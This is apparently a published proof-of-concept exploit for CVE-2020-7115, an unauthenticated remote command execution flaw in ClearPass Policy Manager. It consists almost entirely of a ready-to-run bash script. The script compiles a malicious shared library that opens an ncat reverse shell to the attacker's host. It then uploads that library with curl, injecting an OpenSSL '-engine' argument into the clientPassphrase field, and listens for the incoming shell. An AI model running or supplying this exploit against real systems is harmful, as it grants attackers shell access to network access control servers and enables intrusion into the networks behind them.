ClearPass Policy Manager Unauthenticated Remote Command Execution

Proof of concept exploit for ClearPass Policy Manager which suffers from an unauthenticated remote command execution vulnerability.


MD5 | 70294e43b84d0d72ae5fcfc777c6605f

#!/usr/bin/env bash
# ClearPass Policy Manager Unauthenticated Remote Command Execution in the WebUI (CVE-2020-7115)
# For best results use OpenSSL/libcrypto shipped with RHEL/CentOS 7.x.
# Questions? Contact [email protected]

if [ "$#" -ne 4 ]; then
echo "Usage: `basename $0` [remote host] [remote port] [local host] [local port]"
exit 0
fi

cat <<EOF >>payload.c
#include <unistd.h>

__attribute__((constructor))
static void init() {
execl("/bin/sh", "sh", "-c", "rm -f /tmp/clientCertFile*.txt ; sleep 1 ; ncat $3 $4 -e /bin/sh", NULL);
}
EOF

gcc -fPIC -c payload.c
gcc -shared -o payload.so -lcrypto payload.o
rm -f payload.c payload.o

curl -X POST -F 'clientPassphrase=req -engine /tmp/clientCertFile*.txt' -F '[email protected]/payload.so' -k https://$1:$2/tips/tipsSimulationUpload.action &>/dev/null &

ncat -v -l $3 $4

Related Posts